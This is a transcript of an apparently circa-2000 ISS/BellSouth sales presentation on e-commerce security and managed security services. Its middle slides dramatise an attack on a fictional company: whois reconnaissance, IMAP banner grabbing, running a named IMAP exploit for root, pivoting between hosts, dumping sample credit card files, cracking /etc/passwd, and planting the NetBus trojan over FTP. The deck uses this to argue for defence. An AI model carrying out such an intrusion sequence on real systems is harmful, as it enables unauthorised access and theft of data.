Protecting The Digital Economy - PowerPoint PPT Presentation

Slides: 62
Provided by: IntelliMed

Transcript and Presenter's Notes

Title: Protecting The Digital Economy


1
Protecting The Digital Economy
David Gerulski, Director of Marketing, Internet Security Systems
2
Agenda
  • Introduction
  • E-Commerce Security Drivers
  • Developing a Security Policy
  • Anatomy of an Attack
  • Policy Enforcement
  • Enterprise Risk Management
  • Security Resources
  • Conclusion

3
ISS Overview
  • Headquartered in Atlanta, GA, USA
  • Pioneered vulnerability assessment and intrusion
    detection technology
  • Leader in Enterprise Security Management
  • Publicly traded on NASDAQ: ISSX
  • Industry-leading technology: 35 product awards
  • 1,000 employee owners worldwide
  • Over 300 certified security partners
  • Over 7,500 customers worldwide

4
ISS Market Share
Network Intrusion Detection Assessment Market
Network Intrusion Detection Market
Network Vulnerability Assessment Market
Source: International Data Corporation (IDC), August 1999
5
E-Commerce Security Drivers
6
Business Is Changing
Yesterday
  • Internal Focus: Access is granted to employees only
  • Centralized Assets: Applications and data are centralized in
    fortified IT bunkers
  • Prevent Losses: The goal of security is to protect against
    confidentiality breaches
  • IT Control: Security manager decides who gets access
Today
  • External Focus: Suppliers, customers, and prospects all need some
    form of access
  • Distributed Assets: Applications and data are distributed across
    servers, locations, and business units
  • Generate Revenue: The goal of security is to enable eCommerce
  • Business Control: Business units want the authority to grant access
Source: Forrester Research, Inc.
7
The Threat Grows
Source: 1998 Computer Security Institute/FBI Computer Crime and Security Survey
8
The Internal Threat Is Real
9
E-Commerce Issues
  • Principal Business Drivers
    • Increase Revenue
    • Increase Profitability
  • Principal Security Drivers
    • Greater Susceptibility to Attack
    • Greater Probability of Catastrophic Consequences
    • Much Greater Loss-to-Incident Ratio

10
Corporate Security Challenges
  • Internet User and Transaction Growth
  • eBusiness Is a Priority
  • Benefits and Risks of Open Systems
  • Dynamic Networks and Security Confusion
  • Growing Internal and External Threats
  • Limited Security Resources and Expertise
  • Security Management Is Very Complex

11
Our Strength Is Our Weakness
  • In Touch With Anyone With a Modem
  • Have an International Presence
  • Partners Can Now Collaborate
  • Leverage Web-based Supply Chain Technologies
  • Employees Can Work From Home, at Night, Over the
    Weekends, and on Holiday
  • Application Servers Can Support Entire Divisions

12
Consequences
  • Exposure to Legal Liability

13
DDoS: Distributed Denial-of-Service
[Network diagram: Company A, Company B, Company C, Company D and University A; UNIX firewall, router, web server, NT and UNIX hosts]
14
Consequences
  • Exposure to legal liability
  • Decreased Stockholder Equity
  • 30 Seconds on CNN
  • Damaged Image

15
(No Transcript)
16
Consequences
  • Exposure to Legal Liability
  • Decreased Stockholder Equity
  • 30 Seconds on CNN
  • Damaged Image
  • Decreased Employee Productivity
  • Loss of Intellectual Property Assets
  • Inefficient Use of Resources

17
Summary
  • E-Business is here to stay
  • Networks are exposed and under attack
  • There's no more turning a blind eye
  • It's a business issue and it should be treated in
    a business-like manner
  • Implement a security program, not a security
    technology

18
Developing a Security Policy: A Blueprint for Success
19
Security Policy
  • Blueprint for a Good Security Program
  • Standards Based - British Standard 7799
  • Management Buy In
  • High Level to Technical
  • Business Driven Not Vendor Driven
  • Non-Static

20
Enforced Security Policy
  • Minimize Exposure to Vulnerabilities
  • Prepare for Attacks on Our Systems
  • Manage Internal Staff Behavior
  • Manage External Access and Activity
  • Maintain Appropriate Security Configurations &
    Response Strategies
  • Exploit Built-in Security Features
  • Measure and Record Patterns and Trends for
    Future Security Planning

21
The Anatomy of an Attack
22
(No Transcript)
23
(No Transcript)
24
bigwidget.com
25
Registrant:
Big Widget, Inc. (BIGWIDGET_DOM)
1111 Big Widget Drive
Really Big, CA 90120
US

Domain Name: BIGWIDGET.COM

Administrative Contact, Technical Contact:
Simms, Haywood (HS69) Haywood.Simms_at_BIGWIDGET.COM
1111 Big Widget Drive, UMIL04-07
Really Big, CA 90210
678-443-6001

Zone Contact, Billing Contact:
Dodge, Rodger (RD32) Rodger.Dodge_at_BIGWIDGET.COM
1111 Big Widget Drive, UMIL04-47
Really Big, CA 90210
678-443-6014

Record last updated on 24-June-2000
Record expires on 20-Mar-2010
Record created on 14-Mar-1998
Database last updated on 7-Jun-2000 15:54

Domain servers in listed order:
EHECATL.BIGWIDGET.COM 208.21.0.7
NS1-AUTH.SPRINTLINK.NET 206.228.179.10
NS.COMMANDCORP.COM 130.205.70.10
26
hacker> telnet bigwidget.com 25
Trying 10.0.0.28...
Connected to bigwidget.com
Escape character is '^]'.
Connection closed by foreign host.
hacker> telnet bigwidget.com 143
Trying 10.0.0.28...
Connected to bigwidget.com.
* OK bigwidget IMAP4rev1 Service 9.0(157) at Wed, 14 Oct 1998 11:51:50 -0400 (EDT) (Report problems in this server to MRC_at_CAC.Washington.EDU)
. logout
* BYE bigwidget IMAP4rev1 server terminating connection
. OK LOGOUT completed
Connection closed by foreign host.
27
imap
28
imap
29
(No Transcript)
30
hacker> ./imap_exploit bigwidget.com
IMAP Exploit for Linux.
Author Akylonius (aky_at_galeb.etf.bg.ac.yu)
Modifications p1 (p1_at_el8.org)
Completed successfully.
hacker> telnet bigwidget.com
Trying 10.0.0.28...
Connected to bigwidget.com.
Red Hat Linux release 4.2 (Biltmore)
Kernel 2.0.35 on an i686
login: root
bigwidget> whoami
root
bigwidget> cd /etc
bigwidget> cat ./hosts
127.0.0.1 localhost localhost.localdomain
208.21.2.10 thevault accounting
208.21.2.11 fasttalk sales
208.21.2.12 geekspeak engineering
208.21.2.13 people human resources
208.21.2.14 thelinks marketing
208.21.2.15 thesource information systems
bigwidget> rlogin thevault
31
thevault> cd /data/creditcards
thevault> cat visa.txt
Allan B. Smith 6543-2223-1209-4002 12/99
Donna D. Smith 6543-4133-0632-4572 06/98
Jim Smith 6543-2344-1523-5522 01/01
Joseph L.Smith 6543-2356-1882-7532 04/02
Kay L. Smith 6543-2398-1972-4532 06/03
Mary Ann Smith 6543-8933-1332-4222 05/01
Robert F. Smith 6543-0133-5232-3332 05/99
thevault> crack /etc/passwd
Cracking /etc/passwd...
username bobman password nambob
username mary password mary
username root password ncc1701
thevault> ftp thesource
Connected to thesource
220 thesource Microsoft FTP Service (Version 4.0).
Name: administrator
331 Password required for administrator.
Password:
230 User administrator logged in.
Remote system type is Windows_NT.
32
(No Transcript)
33
(No Transcript)
34
ftp> cd \temp
250 CDW command successful.
ftp> send netbus.exe
local netbus.exe remote netbus.exe
200 PORT command successful.
150 Opening BINARY mode data connection for netbus.exe
226 Transfer complete.
ftp> quit
thevault> telnet thesource
Trying 208.21.2.160...
Connected to thesource.bigwidget.com.
Escape character is '^]'.
Microsoft (R) Windows NT (TM) Version 4.00 (Build 1381)
Welcome to MS Telnet Service
Telnet Server Build 5.00.98217.1
login: administrator
password:

Welcome to Microsoft Telnet Server.
C:\> cd \temp
C:\TEMP> netbus.exe
35
(No Transcript)
36
Anatomy of the Attack
[Network diagram of BigWidget's network: router, UNIX firewall, web server, e-mail server, NT and UNIX hosts, clients, workstations]
37
Real World Web Page Defacements
38
(No Transcript)
39
(No Transcript)
40
New York Times
41
(No Transcript)
42
Policy Enforcement Through Detection and Response
43
What Is Vulnerable?
IT Infrastructure
Web Server
Servers
Firewall
Router
Network
E-Mail Server
Clients Workstations
44
What Is Vulnerable?
Applications
E-Commerce Web Server
Peoplesoft
SAP
Firewall
Router
E-Mail Server
Web Browsers
45
What Is Vulnerable?
Databases
Microsoft SQL Server
Sybase
Oracle
Firewall
Router
46
What Is Vulnerable?
Operating Systems
Solaris
Windows NT
HP-UX
Firewall
Router
Network
AIX
Windows 95 NT
47
What Is Vulnerable?
Networks
Web Server
Servers
Firewall
Router
TCP/IP
Netware
E-Mail Server
48
Enterprise Risk Management
49
Enterprise Security Management
50
Vulnerability Assessment Service
51
Managed Intrusion Detection Service
EMAIL ALERT/ LOG
SESSION TERMINATED
SESSION LOGGED
ATTACK DETECTED
RECONFIGURE FIREWALL/ ROUTER
ATTACK DETECTED
RECORD SESSION
52
Why a managed solution?
Reasons for firewall breach
Computer Security Institute Study 1998
53
Why Outsource?
  • Network Security Is Complex
  • Requires Specialized Skills and Dedicated
    Resources
  • Difficulty in Hiring, Maintaining and Retaining
    IT Security Staff
  • High Costs of Doing It on Your Own

54
Managed Firewall Home Page
55
Firewall Security Policy
56
Firewall - Daily Logs
57
Web Usage Report
58
Intrusion Detection Daily Events
59
Intrusion Detection Custom - Query Entry Screen
60
Benefits of Using BellSouth's Managed Security
Services
  • Enables organizations to establish and maintain
    security across the Internet, Intranet and
    Extranet
  • Less expensive
  • Leverage an existing security infrastructure
  • Offers reliability and cost-effectiveness without
    having to maintain 24x7 dedicated security staff
  • Scalable and modular services enable increased
    flexibility to upgrade services as needed
  • More Secure
  • Based on a robust and proven security
    architecture
  • Utilizes best of breed technologies
  • Supported by a dedicated staff of security
    engineers.
  • Proven operational procedures ensure proper
    response and escalation of security events
  • Round-the-clock real-time monitoring for
    full-time protection
  • All critical Internet-based security needs are
    addressed
  • Frees up your resources to focus on other key
    company initiatives

61
BellSouth & ISS Value Proposition
  • BellSouth
    • Trusted Business Partner
    • Operational Excellence
    • Highest levels of Customer Satisfaction
  • Internet Security Systems (ISS)
    • Security Expertise
    • Market leader in security
  • Together
    • Best in class IP access and network security
      solutions to support your E-Business strategy

62
Thank You!
For more information please join us at
www.iss.net